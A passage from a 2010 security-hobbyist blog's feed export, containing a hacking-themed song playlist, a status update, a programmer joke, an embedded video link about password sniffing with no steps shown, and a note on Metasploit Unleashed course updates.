attack)<br/>12.<a href="http://www.youtube.com/watch?v=QcXVnyiQjBE">Soilwork - Nerve</a>(Cracking a hash)<br/>13.<a href="http://www.youtube.com/watch?v=WEQnzs8wl6E">Metallica - Fade to black</a>(When your internet connection falls)Metallica rule 2 !!<br/>14.<a href="http://www.youtube.com/watch?v=1M6kdQtm4wE">AC/DC - Back in Black</a> (especially for blackhats)<br/>15.<a href="http://www.youtube.com/watch?v=UfY-UhwRP-A&feature=related">AC/DC - Stiff upper lip</a> (after a successful pentest)<br/>16.<a href="http://www.youtube.com/watch?v=ZPXdlVpLaWk">Disturbed - Pain Redefined</a>(When you present the pentest report and show the world how evil you are!)<br/><br/>The songs are not in the order of my liking, they have a random place.<br/>If you know more songs feel free to comment here including a youtube link and a "moment" of listening !sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-85142484208204678912010-08-30T13:13:00.000-07:002012-12-29T03:36:38.781-08:00Blog status updated !!Ok now as you have all been seeing, lately I haven't posted a lot and there is a reason for that. I was on vacation and did not take anything related to technology with me.<br/><br/>Well now that I am back things will change, I've already prepared some nice posts and started remaking the tutorials and edit them properly and I have also been referring my tutorials on <a href="http://securitytube.net">Securitytube</a> so hopefully there will be more video tutorials for you to watch.<br/><br/>However the first priority is to finish remaking my tutorials.<br/><br/>Oh and one last thing, I appreciate your comments and visits, hope I can post more stuff that you guys like !sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-13920676320536034642010-08-30T01:18:00.000-07:002012-12-29T03:36:38.750-08:00.NET vs Java programmers !A group OF 4 Microsoft .NET programmers AND a group OF 4 Java programmers are going ON a train to AN expo. The MS programmers buy a ticket each, AND then watch the Java programmers proceed to buy one ticket between them.<br/> <br/> The MS programmers are intrigued AND when they get ON the train, they watch the Java programmers to see what they do when the guard comes to check the tickets. It turns out that, before the guard comes, they all cram into the toilet. The guard knocks ON the door, AND asks for the ticket. The guard takes it from under the door, AND slides it back.<br/> <br/> The MS programmers are all impressed, SO ON the way back, they buy only one ticket. Only to watch the Java folks get ON the train without buying a ticket AT all.<br/> <br/> When they get ON the train, the MS people cram into the toilet, as they saw the Java folks ON the earlier journey. The Java programmers then knock ON the door, AND say "Ticket please". The MS programmers slide the ticket under the door, as they saw the Java programmers do earlier.<br/> <br/> "Thank you", they say. "You steal our methods, but you don't understand them."sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-46572550878868850422010-08-29T10:03:00.000-07:002012-12-29T03:36:38.760-08:00Advanced password sniffing using ettercap and sslstrip<embed src="http://blip.tv/play/AYH49HwA" type="application/x-shockwave-flash" width="450" height="400" allowscriptaccess="always" allowfullscreen="true"></embed>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-91261687508090638382010-08-27T00:45:00.000-07:002012-12-29T03:36:38.788-08:00Metasploit Unleashed – UpdatesSo I guess the rumors are true :) the Metasploit Unleashed course will be updated on a monthly basis.<br/>We can expect a whole lot of new content being added onto the Metasploit Unleashed Wiki in the next few months, for now they have added 9 new sections.<br/><br/>You can find the course at : <a href="http://www.offensive-security.com/metasploit-unleashed/">Metasploit_unleashed</a><br/>Source: <a href="http://www.offensive-security.com/metasploit-unleashed-training/metasploit-unleashed-updates/">www.offensive-security.com</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0